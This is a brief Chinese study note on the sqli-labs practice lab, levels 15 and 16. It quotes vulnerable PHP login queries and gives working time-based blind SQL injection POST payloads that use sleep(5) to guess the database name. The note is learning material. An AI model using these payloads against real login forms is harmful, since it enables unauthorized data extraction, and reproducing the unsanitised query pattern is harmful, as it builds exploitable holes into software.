本文记录 SQL 注入的学习过程,资料为 SQLi
Less - 15: POST - Blind - Booliant/time Based - Single Quotes##
-
测试漏洞
本馆没有错误提示,利用延时注入
源代码中
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
使用了 ‘uname’ 进行处理
-
利用延时注入猜数据库
post数据: uname=admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit # 或者 uname=admin'and If(left(database(),1)='s',1,sleep(5))#&passwd=11&submit=Submit # 数据库的第一位是 s
正确的时候可以直接登录,不正确的时候延时 5 秒。
Less - 16: POST - Blind - Booliant/time Based - Double Quotes##
-
测试漏洞
本馆没有错误提示,利用延时注入
源代码中
$uname='"'.$uname.'"'; $passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
使用了 ("") 进行处理
-
利用延时注入猜数据库
post数据: uname=admin")and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit # 或者 uname=admin")and If(left(database(),1)='s',1,sleep(5))#&passwd=11&submit=Submit # 数据库的第一位是 s
正确的时候可以直接登录,不正确的时候延时 5 秒。